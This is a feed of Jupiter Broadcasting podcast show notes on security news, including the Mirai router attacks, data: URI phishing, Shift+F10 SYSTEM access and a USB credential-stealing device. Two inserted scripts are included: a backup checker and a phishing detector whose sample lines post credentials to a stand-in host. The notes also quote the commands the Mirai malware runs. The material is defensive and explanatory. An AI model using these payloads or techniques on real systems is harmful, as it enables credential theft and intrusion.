router – Jupiter Broadcasting
https://www.jupiterbroadcasting.com
Open Source Entertainment, on Demand.
Last updated: Wed, 24 Mar 2021 01:36:10 +0000

Back in the Freedom Dimension | LINUX Unplugged 398
https://original.jupiterbroadcasting.net/144562/back-in-the-freedom-dimension-linux-unplugged-398/
Tue, 23 Mar 2021 17:30:00 +0000

Show Notes: linuxunplugged.com/398

The post Back in the Freedom Dimension | LINUX Unplugged 398 first appeared on Jupiter Broadcasting.
Archived Knowledge | BSD Now 336
https://original.jupiterbroadcasting.net/139192/archived-knowledge-bsd-now-336/
Thu, 06 Feb 2020 05:00:00 +0000

Show Notes/Links: https://www.bsdnow.tv/336
Self-Hosted: Fixing Brent’s WiFi | Jupiter Extras 45
https://original.jupiterbroadcasting.net/138397/self-hosted-fixing-brents-wifi-jupiter-extras-45/
Fri, 10 Jan 2020 04:00:00 +0000

Show Notes: extras.show/45
Machine Learning Magic | TechSNAP 417
https://original.jupiterbroadcasting.net/137397/machine-learning-magic-techsnap-417/
Fri, 29 Nov 2019 00:15:00 +0000

Show Notes: techsnap.systems/417
Keeping Systems Simple | TechSNAP 403
https://original.jupiterbroadcasting.net/131156/keeping-systems-simple-techsnap-403/
Fri, 10 May 2019 21:00:15 +0000

Show Notes: techsnap.systems/403
The Future of HTTP | TechSNAP 389
https://original.jupiterbroadcasting.net/128101/the-future-of-http-techsnap-389/
Thu, 15 Nov 2018 19:45:06 +0000

Show Notes: techsnap.systems/389
We Found Another Spectre, Meltdown Flaw | Ask Noah Show 66
https://original.jupiterbroadcasting.net/125096/we-found-another-spectre-meltdown-flaw-ask-noah-show-66/
Thu, 24 May 2018 12:00:18 +0000

Show Notes: podcast.asknoahshow.com/66
HPKP: Hard to Say, Hard to Use | TechSNAP 334
https://original.jupiterbroadcasting.net/117826/hpkp-hard-to-say-hard-to-use-techsnap-334/
Tue, 29 Aug 2017 21:57:11 +0000

RSS Feeds:

HD Video Feed | MP3 Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Patreon

Show Notes:

Using VPN for all WAN traffic

  • “I have a server with 2 1GB NICs, an un-managed switch, and a single gateway. Ideally, I would like WAN traffic routed through a PIA VPN using openVPN, and LAN traffic to be routed locally without a VPN.”

  • An unmanaged switch isn’t ideal, but it’s far from bad.

  • Assuming the server will act as firewall / gateway:

  • NIC #1 to the router/modem, NIC #2 to the switch with a static IP (say 10.1.1.1)

  • Run a DHCP server on the server, handing out 10.1.1.1 as the default gateway and whatever DNS you see fit

  • Everything from the LAN will go out via NIC #2 of the server

  • The server connects to the VPN provider via OpenVPN. There are options to set the default gateway; this is the gateway the server will use, so all traffic leaving your network will go out through the VPN.

  • I haven’t used PIA, but I’d guess you want your OpenVPN connection to accept their configuration settings (DNS, etc.) and use them on your server while OpenVPN is running.

A Protocol For Distributed Multiparty Chat Encryption

  • Review by NCC Group.

  • The protocol has the following security properties for group messaging:
    • Confidentiality: the conversation is not readable to an outsider
    • Forward secrecy: conversation history remains unreadable to an outsider even if participants’ encryption keys are compromised
    • Deniable authentication: Nobody can prove your participation in a chat
    • Authorship: A message recipient can be assured of the sender’s authenticity even if other participants in the room try to impersonate the sender
    • Room consistency: Group chat participants are confident that they are in the same room
    • Transcript consistency: Group chat participants are confident that they are seeing the same sequence of messages

I’m giving up on HPKP


Feedback


Round Up:

Gambling with Code | TechSNAP 305
https://original.jupiterbroadcasting.net/106721/gambling-with-code-techsnap-305/
Tue, 07 Feb 2017 23:31:28 +0000

Show Notes:

Russians Engineer a Brilliant Slot Machine Cheat—And Casinos Have No Fix

  • In this case, it was the accountants who noticed something was wrong.

  • What? No centralised real-time monitoring?

  • IN EARLY JUNE 2014, accountants at the Lumiere Place Casino in St. Louis noticed that several of their slot machines had—just for a couple of days—gone haywire. The government-approved software that powers such machines gives the house a fixed mathematical edge, so that casinos can be certain of how much they’ll earn over the long haul—say, 7.129 cents for every dollar played. But on June 2 and 3, a number of Lumiere’s machines had spit out far more money than they’d consumed, despite not awarding any major jackpots, an aberration known in industry parlance as a negative hold. Since code isn’t prone to sudden fits of madness, the only plausible explanation was that someone was cheating.

  • Casino security pulled up the surveillance tapes and eventually spotted the culprit, a black-haired man in his thirties who wore a Polo zip-up and carried a square brown purse. Unlike most slots cheats, he didn’t appear to tinker with any of the machines he targeted, all of which were older models manufactured by Aristocrat Leisure of Australia. Instead he’d simply play, pushing the buttons on a game like Star Drifter or Pelican Pete while furtively holding his iPhone close to the screen.

  • He’d walk away after a few minutes, then return a bit later to give the game a second chance. That’s when he’d get lucky. The man would parlay a $20 to $60 investment into as much as $1,300 before cashing out and moving on to another machine, where he’d start the cycle anew. Over the course of two days, his winnings tallied just over $21,000. The only odd thing about his behavior during his streaks was the way he’d hover his finger above the Spin button for long stretches before finally jabbing it in haste; typical slots players don’t pause between spins like that.

  • On June 9, Lumiere Place shared its findings with the Missouri Gaming Commission, which in turn issued a statewide alert. Several casinos soon discovered that they had been cheated the same way, though often by different men than the one who’d bilked Lumiere Place. In each instance, the perpetrator held a cell phone close to an Aristocrat Mark VI model slot machine shortly before a run of good fortune.

  • By examining rental-car records, Missouri authorities identified the Lumiere Place scammer as a 37-year-old Russian national. He had flown back to Moscow on June 6, but the St. Petersburg–based organization he worked for, which employs dozens of operatives to manipulate slot machines around the world, quickly sent him back to the United States to join another cheating crew. The decision to redeploy him to the US would prove to be a rare misstep for a venture that’s quietly making millions by cracking some of the gaming industry’s most treasured algorithms.

  • Russia has been a hotbed of slots-related malfeasance since 2009, when the country outlawed virtually all gambling. (Vladimir Putin, who was prime minister at the time, reportedly believed the move would reduce the power of Georgian organized crime.) The ban forced thousands of casinos to sell their slot machines at steep discounts to whatever customers they could find. Some of those cut-rate slots wound up in the hands of counterfeiters eager to learn how to load new games onto old circuit boards. Others apparently went to the suspect’s bosses in St. Petersburg, who were keen to probe the machines’ source code for vulnerabilities.

  • By early 2011, casinos throughout central and eastern Europe were logging incidents in which slots made by the Austrian company Novomatic paid out improbably large sums. Novomatic’s engineers could find no evidence that the machines in question had been tampered with, leading them to theorize that the cheaters had figured out how to predict the slots’ behavior. “Through targeted and prolonged observation of the individual game sequences as well as possibly recording individual games, it might be possible to allegedly identify a kind of ‘pattern’ in the game results,” the company admitted in a February 2011 notice to its customers.

  • Recognizing those patterns would require remarkable effort. Slot machine outcomes are controlled by programs called pseudorandom number generators that produce baffling results by design. Government regulators, such as the Missouri Gaming Commission, vet the integrity of each algorithm before casinos can deploy it.

  • But as the “pseudo” in the name suggests, the numbers aren’t truly random. Because human beings create them using coded instructions, PRNGs can’t help but be a bit deterministic. (A true random number generator must be rooted in a phenomenon that is not manmade, such as radioactive decay.) PRNGs take an initial number, known as a seed, and then mash it together with various hidden and shifting inputs—the time from a machine’s internal clock, for example—in order to produce a result that appears impossible to forecast. But if hackers can identify the various ingredients in that mathematical stew, they can potentially predict a PRNG’s output. That process of reverse engineering becomes much easier, of course, when a hacker has physical access to a slot machine’s innards.

  • Knowing the secret arithmetic that a slot machine uses to create pseudorandom results isn’t enough to help hackers, though. That’s because the inputs for a PRNG vary depending on the temporal state of each machine. The seeds are different at different times, for example, as is the data culled from the internal clocks. So even if they understand how a machine’s PRNG functions, hackers would also have to analyze the machine’s gameplay to discern its pattern. That requires both time and substantial computing power, and pounding away on one’s laptop in front of a Pelican Pete is a good way to attract the attention of casino security.

  • On December 10, not long after security personnel spotted the suspect inside the Hollywood Casino in St. Louis, four scammers were arrested. Because he and his cohorts had pulled their scam across state lines, federal authorities charged them with conspiracy to commit fraud. The indictments represented the first significant setbacks for the St. Petersburg organization; never before had any of its operatives faced prosecution.

  • The Missouri and Singapore cases appear to be the only instances in which scammers have been prosecuted, though a few have also been caught and banned by individual casinos. At the same time, the St. Petersburg organization has sent its operatives farther and farther afield. In recent months, for example, at least three casinos in Peru have reported being cheated by Russian gamblers who played aging Novomatic Coolfire slot machines.

  • The economic realities of the gaming industry seem to guarantee that the St. Petersburg organization will continue to flourish. The machines have no easy technical fix. As Hoke notes, Aristocrat, Novomatic, and any other manufacturers whose PRNGs have been cracked “would have to pull all the machines out of service and put something else in, and they’re not going to do that.” (In Aristocrat’s statement to WIRED, the company stressed that it has been unable “to identify defects in the targeted games” and that its machines “are built to and approved against rigid regulatory technical standards.”) At the same time, most casinos can’t afford to invest in the newest slot machines, whose PRNGs use encryption to protect mathematical secrets; as long as older, compromised machines are still popular with customers, the smart financial move for casinos is to keep using them and accept the occasional loss to scammers.

  • So the onus will be on casino security personnel to keep an eye peeled for the scam’s small tells. A finger that lingers too long above a spin button may be a guard’s only clue that hackers in St. Petersburg are about to make another score.

Netgear Exploit Found in 31 Models Lets Hackers Turn Your Router Into a Botnet

  • This came to our attention from Shawn
  • For most people, routers are the little boxes which sit between you and your ISP. They do NAT, possibly firewalling, and generally stop the outside world from getting in without your permission. Well, that’s what they are supposed to do. The long-standing issue is updates. When vulnerabilities are found, the code needs to be patched. With these devices, that issue can be troublesome, given that everyday consumers cannot be expected to update them. For us geeks, this isn’t so much of an issue, if the updates are made available to us.
  • We patch our own systems already, patching the firmware on a device… we can do that too.
  • The vast majority of router users are unaware that they require an update. They sit there waiting, and sometimes they are found. When they are found to have a vulnerability, they can become part of a bot-net, a huge collection of devices ready to do the bidding of those with ill-intent. These bot-nets can be used for a variety of malicious purposes. Why do this? Most often, it’s money.
  • This story is about someone discovering a problem with their router, and then exploring it.

GitLab.com melts down after wrong directory deleted, backups fail

  • This also came from Shawn

  • Source-code hub GitLab.com is in meltdown after experiencing data loss as a result of what it has suddenly discovered are ineffectual backups.

  • On Tuesday evening, Pacific Time, the startup issued a sobering series of tweets we’ve listed below. Behind the scenes, a tired sysadmin, working late at night in the Netherlands, had accidentally deleted a directory on the wrong server during a frustrating database replication process: he wiped a folder containing 300GB of live production data that was due to be replicated.

  • Just 4.5GB remained by the time he canceled the rm -rf command. The last potentially viable backup was taken six hours beforehand.

  • That Google Doc mentioned in the last tweet notes: “This incident affected the database (including issues and merge requests) but not the git repos (repositories and wikis).”

  • So some solace there for users because not all is lost. But the document concludes with the following:

  • So in other words, out of 5 backup/replication techniques deployed none are working reliably or set up in the first place.

  • The world doesn’t contain enough faces and palms to even begin to offer a reaction to that sentence. Or, perhaps, to summarise the mistakes the startup candidly details as follows:

    • LVM snapshots are by default only taken once every 24 hours. YP happened to run one manually about 6 hours prior to the outage

    • Regular backups seem to also only be taken once per 24 hours, though YP has not yet been able to figure out where they are stored. According to JN these don’t appear to be working, producing files only a few bytes in size.

    • SH: It looks like pg_dump may be failing because PostgreSQL 9.2 binaries are being run instead of 9.6 binaries. This happens because omnibus only uses Pg 9.6 if data/PG_VERSION is set to 9.6, but on workers this file does not exist. As a result it defaults to 9.2, failing silently. No SQL dumps were made as a result. Fog gem may have cleaned out older backups.

    • Disk snapshots in Azure are enabled for the NFS server, but not for the DB servers.

    • The synchronisation process removes webhooks once it has synchronised data to staging. Unless we can pull these from a regular backup from the past 24 hours they will be lost

    • The replication procedure is super fragile, prone to error, relies on a handful of random shell scripts, and is badly documented

    • Our backups to S3 apparently don’t work either: the bucket is empty

  • Making matters worse is the fact that GitLab last year decreed it had outgrown the cloud and would build and operate its own Ceph clusters. GitLab’s infrastructure lead Pablo Carranza said the decision to roll its own infrastructure “will make GitLab more efficient, consistent, and reliable as we will have more ownership of the entire infrastructure.”

  • See also GitLab.com Database Incident

  • see also Catastrophic Failure – Myth Weavers – My thanks to Rikai for bringing this to our attention.

  • example of why making sure your backup solution is solid as hell is extremely important

  • The guy is completely honest and takes ownership of the mistakes he made. Hopefully others can learn from his mistakes.

  • For context, myth-weavers is a website that handles things like the creation, management and sharing of D&D (and other tabletop RPG) character sheets online (https://www.myth-weavers.com/sheetindex.php); they lost about 6 months of data.

  • Backup automation is good, because people will fail and skip steps more often than computers will, and this is a perfect example of that.

  • The trick is getting it done RIGHT and having it NOTIFY you when something ISN’T right. As well as making it consistent, reproducible and redundant if possible. This is also an example of why if you have data you care about, that step should not be skipped.

  • Automated backups are a lot of up-front work that people often avoid doing, at least partially and regret it later. This is a well documented postmortem of what happens when you do that and why you should set aside the time and get it done

  • Not exactly mission-critical data, but still very important data for the audience they cater to. Handcrafted, imagination-related kind of stuff.

  • This GitLab outage and database deletion & lack of backups is a great reminder to routinely test your disaster recovery strategies

  • Dataloss at GitLab

  • Thoughts On Gitlab Data Incident

  • Blameless PostMortems and a Just Culture
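The failures listed in the GitLab notes above (dumps only a few bytes long because the wrong pg_dump binary ran and failed silently, an empty S3 bucket, nothing checking any of it) are exactly what a verification step catches. The script below is an added example written for this page; it is not GitLab’s code and not anything from the show. It assumes plain-format pg_dump output, which starts with a `-- PostgreSQL database dump` header comment and ends with a `-- PostgreSQL database dump complete` trailer, and that dumps sit in one directory as `*.sql` files; the sample dumps it builds are constructed.

```shell
#!/bin/sh
# Added example: sanity-check PostgreSQL dumps before trusting them as backups.
# Assumptions (not from the page): plain-format pg_dump output with its
# standard header/trailer comments, dumps stored as DIR/*.sql.

# Compare the major version reported by `pg_dump --version` with the one the
# server runs. In the incident, 9.2 binaries silently dumped a 9.6 cluster;
# this turns that mismatch into a loud failure before any dump is attempted.
# For the 9.x series the "major" is the first two components (assumption:
# 9.x era, as in the incident; PostgreSQL 10+ uses a single component).
#   pg_dump_major_matches "pg_dump (PostgreSQL) 9.2.24" "9.6"   -> returns 1
pg_dump_major_matches() {
    banner=$1
    expected=$2
    actual=$(printf '%s\n' "$banner" | sed -n 's/.*(PostgreSQL) \([0-9][0-9]*\.[0-9][0-9]*\).*/\1/p')
    [ -n "$actual" ] && [ "$actual" = "$expected" ]
}

# Verify one dump file: it must exist, be at least MIN_BYTES long, carry the
# pg_dump header, and carry the "dump complete" trailer (a failed or killed
# run leaves the trailer out). Prints one status line; returns 0 only on OK.
check_dump() {
    file=$1
    min_bytes=${2:-1048576}   # default 1 MiB; set this from your real dump size
    [ -f "$file" ] || { echo "MISSING: $file"; return 1; }
    size=$(wc -c < "$file" | tr -d ' ')
    if [ "$size" -lt "$min_bytes" ]; then
        echo "TOO SMALL: $file is $size bytes (minimum $min_bytes)"
        return 1
    fi
    head -n 5 "$file" | grep -q 'PostgreSQL database dump' \
        || { echo "BAD HEADER: $file"; return 1; }
    tail -n 5 "$file" | grep -q 'PostgreSQL database dump complete' \
        || { echo "TRUNCATED: $file"; return 1; }
    echo "OK: $file ($size bytes)"
}

# Verify every *.sql dump in DIR. Exit status is the number of failing files
# (1 if there are no dumps at all), so a cron wrapper can alert on non-zero
# instead of assuming the job succeeded because it produced no error text.
verify_dump_dir() {
    dir=$1
    min_bytes=$2
    failures=0
    found=0
    for f in "$dir"/*.sql; do
        [ -e "$f" ] || break       # glob matched nothing: the "bucket is empty" case
        found=1
        check_dump "$f" "$min_bytes" || failures=$((failures + 1))
    done
    if [ "$found" -eq 0 ]; then
        echo "NO DUMPS in $dir"
        return 1
    fi
    return "$failures"
}

# Constructed sample directory: one healthy dump, one near-empty dump like the
# ones the wrong binary produced, one truncated dump. Prints the directory path.
make_sample_dumps() {
    dir=$(mktemp -d)
    printf '%s\n' '--' '-- PostgreSQL database dump' '--' \
        'CREATE TABLE issues (id integer);' '--' \
        '-- PostgreSQL database dump complete' '--' > "$dir/good.sql"
    printf '%s\n' '--' > "$dir/tiny.sql"
    printf '%s\n' '--' '-- PostgreSQL database dump' '--' \
        'CREATE TABLE merge_requests (id integer);' > "$dir/truncated.sql"
    echo "$dir"
}

# Stand-alone demo: two of the three sample files should fail.
sample=$(make_sample_dumps)
if verify_dump_dir "$sample" 20; then
    echo "all dumps OK"
else
    echo "failing dumps: $?"
fi
rm -rf "$sample"
```

Run it from the same cron job that takes the dump, after the dump finishes, and route any non-zero exit to a pager or mailbox that a person actually reads; a check that only writes to a log nobody looks at is the same as no check.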


Feedback:


Round Up:


Internet of Voice Triggers | TechSNAP 302
https://original.jupiterbroadcasting.net/106226/internet-of-voice-triggers-techsnap-302/
Tue, 17 Jan 2017 07:37:39 +0000

Show Notes:

Malware hosted in your browser

  • Last show, we talked about malware, blocking it via URLs, and malware which spoofs the domain names, thereby bypassing many URL-based filters.
  • This show, we have an instance of malware which completely defeats all of the above, in a very simple and clever way.
  • A common way to steal credentials is hosting a webpage which looks a lot like the real thing. Google, Facebook, Paypal, etc are all targets of this. It is simple to do. Just throw up a web page, and start directing people to it.
  • Lots of ways to defeat this with conventional tools
  • This method bypasses all those tools
  • Tom Scott tweeted about malware he received via email.
  • when you click on the link, you get what appears to be a Google Login page.
  • The URI is of the form: data:text/html,https…… lots of spaces <script src=data:text/html;…. etc
  • However, it is hosted entirely within your browser
  • Matt Hughes reported that Android actually tries to autofill his Google account credentials on that data URI
  • This has been around at least a year, and was written about by linkcabin: it spoofs the login page by hosting it in your browser.
  • Surprisingly common, and often used to phish Google or PayPal
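Because the page is never fetched from a server, URL filters see nothing to block; what a mail gateway or proxy log scanner can match instead is the shape described above: a `data:text/html` URI carrying a legitimate-looking `https://` prefix, a long run of whitespace that pushes the rest out of the address bar, and an embedded script. The script below is an added example written for this page, not code from the show, from Tom Scott or from linkcabin. Its sample log lines are constructed, and the threshold of eight or more spaces (literal or `%20`) is an assumption to tune for your own traffic.

```shell
#!/bin/sh
# Added example: flag data: URIs shaped like the in-browser login phish above.
# Assumptions (not from the page): one link per line; padding may be literal
# spaces or URL-encoded %20; 8 or more of them after an https:// URL is suspect.

# classify_uri URI -> prints one of:
#   clean            not a data:text/html URI at all
#   data-html        a data:text/html URI with no phishing markers (still worth logging)
#   data-html-phish  data:text/html plus a padded https:// prefix or an inline script
classify_uri() {
    uri=$1
    printf '%s' "$uri" | grep -qi 'data:text/html' || { echo clean; return 0; }
    # Whitespace padding after a real-looking https:// URL hides the payload
    # off the right edge of the address bar.
    if printf '%s' "$uri" | grep -qiE 'https?://[^ ]*( {8,}|(%20){8,})'; then
        echo data-html-phish
        return 0
    fi
    # An inline script inside a data: document is the other tell from the report.
    if printf '%s' "$uri" | grep -qi '<script'; then
        echo data-html-phish
        return 0
    fi
    echo data-html
}

# count_phish FILE -> prints how many lines of FILE classify as data-html-phish
count_phish() {
    n=0
    while IFS= read -r line || [ -n "$line" ]; do
        [ "$(classify_uri "$line")" = data-html-phish ] && n=$((n + 1))
    done < "$1"
    echo "$n"
}

# Constructed sample log (not real traffic): one ordinary link, one harmless
# data: document, and two lines in the shape the tweet and write-up describe.
write_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
https://example.com/invoice.pdf
data:text/html,<h1>hello</h1>
data:text/html,https://accounts.google.com/ServiceLogin?service=mail                          <script src="data:text/html;base64,ZmFrZQ=="></script>
data:text/html,https://www.paypal.com/signin%20%20%20%20%20%20%20%20%20%20%20%20<form action="https://login.example.invalid/collect">
EOF
    echo "$f"
}

# Stand-alone demo: expects 2 phishing-shaped links in the constructed log.
log=$(write_sample_log)
echo "phishing-shaped links: $(count_phish "$log")"
rm -f "$log"
```

The two-level result is deliberate: a plain `data:text/html` link is unusual enough in mail to be worth logging, but only the padded-prefix or inline-script variants should raise an alert, which keeps the rule from firing on the occasional legitimate inline document.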

Bug Bounty – GitHub Enterprise SQL Injection

  • This story involves responsible research and disclosure by Orange Tsai
  • GitHub Enterprise is the on-premises version of GitHub.com that lets a business deploy a whole GitHub service inside its private network
  • You can get a 45-day free trial and download the VM from enterprise.github.com.
  • Code is downloaded, configured, and observations begin.
  • GitHub uses a custom library to obfuscate their source code. If you search for ruby_concealer.so on Google, you will find a snippet in a gist.
  • The first two days are spent getting the VM running etc.
  • Days 3-5 are spent learning Rails by code reviewing.
  • On day 6, an SQL injection is found

Feedback:


War Story:

Round Up:


Shift+F10 and Done | TechSNAP 295
https://original.jupiterbroadcasting.net/105166/shiftf10-and-done-techsnap-295/
Thu, 01 Dec 2016 19:42:13 +0000

Show Notes:

Researcher accidentally roots Microsoft Azure’s Redhat Update Infrastructure servers

  • “I was tasked with creating a machine image of Red Hat Enterprise Linux that was compliant to the Security Technical Implementation guide defined by the Department of Defense.”
  • “This machine image was to be used for both Amazon Web Services and Microsoft Azure. Both of which offer marketplace images which had a metered billing pricing model. Ideally, I wanted my custom image to be billed under the same mechanism, as such the virtual machines would be able to consume software updates from a local Red Hat Enterprise Linux repository owned and managed by the cloud provider.”
  • “Both Amazon Web Services and Microsoft Azure utilise a deployment of Red Hat Update Infrastructure for supplying this functionality.”
  • “There is only one Red Hat Update Appliance per Red Hat Update Infrastructure installation, however, both Amazon Web Services and Microsoft Azure create one per region.”
  • “Both Amazon Web Services and Microsoft Azure use SSL certificates for authentication against the repositories. However, these are the same SSL certificates for every instance.”
  • “On Amazon Web Services having the SSL certificates is not enough, you must have booted your instance from an AMI that had an associated billing code. It is this billing code that ensures you pay the extra premium for running Red Hat Enterprise Linux.”
  • “On Azure it remains undefined how they manage to track billing. At the time of research, it was possible to copy the SSL certificates from one instance to another and successfully authenticate. Additionally, if you duplicated a Red Hat Enterprise Linux virtual hard disk and created a new instance from it all billing association seemed to be lost but repository access was still available.”
  • “On Azure to setup repository connectivity, they provide an RPM with the necessary configuration. The installation script it references comes from the following archive. If you expand this archive you will find the client configuration for each region.”
  • The post goes over how the hostnames for all of the Update Appliances were discovered
  • “The build host is interesting rhui-monitor.cloudapp.net, at the time of research running a port scan revealed an application running on port 8080.”
  • “Despite the application requiring username and password based authentication, It was possible to execute a run of their “backend log collector” on a specified content delivery server. When the collector service completed the application supplied URLs to archives which contain multiple logs and configuration files from the servers.”
  • “Included within these archives was an SSL certificate that would grant full administrative access to the Red Hat Update Appliances”
  • So now, the researcher could access each Update Appliance with full administrative access and create new packages, or newer versions of common packages, that include a backdoor. Every Red Hat VM on the entire cloud provider would then install this “important security update”, giving the attacker full access to every machine
  • “Given no gpgcheck is enabled, with full administrative access to the Red Hat Enterprise Linux Appliance REST API one could have uploaded packages that would be acquired by client virtual machines on their next yum update.”
  • Even if gpgcheck was enabled, it is likely that the GPG key would be exposed to the administrator of the update appliance
  • “The issue was reported in accordance to the Microsoft Online Services Bug Bounty terms. Microsoft agreed it was a vulnerability in their systems. Immediate action was taken to prevent public access to rhui-monitor.cloudapp.net. Additionally, they eventually prevented public access to the Red Hat Update Appliances and they claim to have rotated all secrets.”

Newly discovered router flaw being hammered by in-the-wild attacks

  • “Online criminals—at least some of them wielding the notorious Mirai malware that transforms Internet-of-things devices into powerful denial-of-service cannons—have begun exploiting a critical flaw that may be present in millions of home routers.”
  • “Routers provided to German and Irish ISP customers for Deutsche Telekom and Eircom, respectively, have already been identified as being vulnerable, according to recently published reports from researchers tracking the attacks. The attacks exploit weaknesses found in routers made by Zyxel, Speedport, and possibly other manufacturers. The devices leave Internet port 7547 open to outside connections. The exploits use the opening to send commands based on the TR-069 and related TR-064 protocols, which ISPs use to remotely manage large fleets of hardware. According to this advisory published Monday morning by the SANS Internet Storm Center, honeypot servers posing as vulnerable routers are receiving exploits every five to 10 minutes.”
  • “SANS Dean of Research Johannes Ullrich said in Monday’s post that exploits are almost certainly the cause behind an outage that hit Deutsche Telekom customers over the weekend. In a Facebook update, officials with the German ISP said 900,000 customers are vulnerable to the attacks until they are rebooted and receive an emergency patch. Earlier this month, researchers at security firm BadCyber reported that the same one-two port 7547/TR-064 exploit hit the home router of a reader in Poland.”
  • “The Shodan search engine shows that 41 million devices leave port 7547 open, while about five million expose TR-064 services to the outside world.”
  • “The attacks started shortly after researchers published attack code that exploited the exposed TR-064 service. Included as a module for the Metasploit exploitation framework, the attack code opens the port 80 Web interface that enables remote administration. From there, devices that use default or otherwise weak authentication passwords can be remotely commandeered and made to join botnets that carry out Internet-crippling denial-of-service attacks.”
  • Exploit Code
  • “To infect as many routers as possible, the exploits deliver three separate exploit files, two tailored to devices running different types of MIPS chips and a third that targets routers with ARM silicon. Just like the Metasploit code, the malicious payloads use the exploit to open the remote administration interface and then attempt to log in using three different default passwords. The attack then closes port 7547 to prevent other criminal enterprises from taking control of the devices”
  • “The malware itself is really friendly as it closes the vulnerability once the router is infected. It performs the following commands:”
    • busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
    • busybox killall -9 telnetd
  • “which should make the device “secure”… until next reboot. The first one closes port 7547 and the second one kills the telnet service, making it really hard for the ISP to update the device remotely.”
  • So while exploited routers will stop being vulnerable to other attackers, they will be harder for the ISP to fix properly
  • ISPs could help protect their customers, and their own command-and-control of customers’ routers, by blocking inbound port 7547 from outside of their network

Hack Windows 10 by holding down Shift+F10

  • “Every Windows 10 in-place Upgrade is a SEVERE Security risk”
  • During the update process, when the computer boots into the updater, holding Shift+F10 pops a command prompt running as SYSTEM, the highest privilege level on Windows.
  • What makes this worse is that it happens after the volume encryption keys have been loaded, so even BitLocker-encrypted disks are exposed to unauthorized access.
  • “This is a big issue and it has been there for a long time. Just a month ago I finally got verification that the Microsoft Product Groups not only know about this but that they have begun working on a fix. As I want to be known as a white hat I had to wait for this to happen before I blog this.”
  • “There is a small but CRAZY bug in the way the “Feature Update” (previously known as “Upgrade”) is installed. The installation of a new build is done by reimaging the machine and the image installed by a small version of Windows called Windows PE (Preinstallation Environment). This has a feature for troubleshooting that allows you to press SHIFT+F10 to get a Command Prompt. This sadly allows for access to the hard disk as during the upgrade Microsoft disables BitLocker. I demonstrate this in the following video.”
  • “The real issue here is the Elevation of Privilege that takes a non-admin to SYSTEM (the root of Windows) even on a BitLocker (Microsoft’s hard disk encryption) protected machine. And of course that this doesn’t require any external hardware or additional software.”
  • Additional Coverage: BleepingComputer
  • “In an email conversation with Bleeping Computer, Laiho reveals that because of certain defaults in Windows 10 configurations, computers might be forced to perform an update, even if a user is not present, or has logged on for a long period of time.”
  • “At some point, every computer that is not managed by WSUS/SCCM or such will force the installation of a new version of Windows. Microsoft has decided that these will be forced by default.”
  • “Laiho recommends that users not leave their computers unattended during a Windows 10 update and that users remain on Windows 10 LTSB (Long Time Servicing Branch) versions for the time being.”
  • “The LTSB-version of Windows 10 is not affected by this as it doesn’t automatically do upgrades”
  • “Furthermore, Laiho says that Windows SCCM (System Center Configuration Manager) can block access to the command-line interface during update procedures if users add a file named DisableCMDRequest.tag to the %windir%\Setup\Scripts\ folder.”
  • The Police could use this on seized laptops, just keep the machine offline until the next “feature update”, then pop a command prompt during the installation, and have unrestricted access to the encrypted disk.

The post Shift+F10 and Done | TechSNAP 295 first appeared on Jupiter Broadcasting.

I Can’t Believe It’s Not Ethernet | TechSNAP 283 https://original.jupiterbroadcasting.net/102961/i-cant-believe-its-not-ethernet-techsnap-283/ Thu, 08 Sep 2016 20:00:44 +0000 https://original.jupiterbroadcasting.net/?p=102961

The post I Can't Believe It's Not Ethernet | TechSNAP 283 first appeared on Jupiter Broadcasting.

Show Notes:

Modified USB ethernet adapter can steal windows and mac credentials

  • “Security researcher Rob Fuller has discovered a unique attack method that can steal PC credentials from Windows and Mac computers, and possibly Linux (currently untested).”
  • Thesis: “If I plug in a device that masquerades as a USB Ethernet adapter and has a computer on the other end, can I capture credentials from a system, even when locked out”
  • “The researcher used USB-based Ethernet adapters, for which he modified the firmware code to run special software that sets the plug-and-play USB device as the network gateway, DNS, and WPAD servers on the computer it’s connected to.”
  • “The attack is possible because most computers will automatically install any plug-and-play (PnP) USB device. This means that even if a system is locked out, the device still gets installed”
  • “Now, I believe there are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list.”
  • “When installing the new (rogue) plug-and-play USB Ethernet adapter, the computer will give out the PC credentials needed to install the device. Fuller’s modified device includes software that intercepts these credentials and saves them to an SQLite database. The password is in its hashed state, but this can be cracked using currently available technology. The researcher’s modified device also includes a LED that lights up when the credentials have been recorded.”
  • So, just like in a spy movie, you plug in the device, wait until the light comes on, and you have stolen the credentials
  • “An attacker would need physical access to a device to plug in the rogue USB Ethernet adapter, but Fuller says the average attack time is 13 seconds.”
  • The attack was tested against versions of Windows as far back as Windows 98 SE, and as modern as Windows 10 Enterprise and OS X El Capitan
  • The device pretends to be an ethernet adapter, and provides access to a ‘network’, where a DHCP server tells you to install this proxy configuration
  • “This means that by plugging in the device it quickly becomes the gateway, DNS server, WPAD server and others”
  • It gives you the hashed password of the logged-in user, which you can then crack offline, returning later to log in with the recovered password
  • Researcher blog

Zstandard, a new compression algorithm from Facebook

  • Unlike the new Dropbox algorithm that is designed specifically for jpeg images, this is a general purpose algorithm, designed to replace gzip
  • “Today, the reigning data compression standard is Deflate, the core algorithm inside Zip, gzip, and zlib. For two decades, it has provided an impressive balance between speed and space, and, as a result, it is used in almost every modern electronic device (and, not coincidentally, used to transmit every byte of the very blog post you are reading). Over the years, other algorithms have offered either better compression or faster compression, but rarely both. We believe we’ve changed this.”
  • There are three standard metrics for comparing compression algorithms and implementations:
    • Compression ratio: The original size (numerator) compared with the compressed size (denominator), measured in unitless data as a size ratio of 1.0 or greater.
    • Compression speed: How quickly we can make the data smaller, measured in MB/s of input data consumed.
    • Decompression speed: How quickly we can reconstruct the original data from the compressed data, measured in MB/s for the rate at which data is produced from compressed data.
  • “The type of data being compressed can affect these metrics, so many algorithms are tuned for specific types of data, such as English text, genetic sequences, or rasterized images. However, Zstandard, like zlib, is meant for general-purpose compression for a variety of data types. To represent the algorithms that Zstandard is expected to work on, in this post we’ll use the Silesia corpus, a data set of files that represent the typical data types used every day.”
  • The post compares the best of the modern compression algorithms, lz4 (what ZFS uses), zstd (Facebook’s new thing), libz (gzip, what your browser uses for webpages), and xz (what most unix distros have switched to for compressing tar and log files)
  • In the comparison, LZ4 does not compress the data as much, but does so at almost 450 MB/s, while zlib compresses more, but only 23 MB/s. XZ compresses even better, but at only 2.3 MB/s
  • zstd gets about the same compression as zlib, but at almost 6 times the speed (136 MB/s)
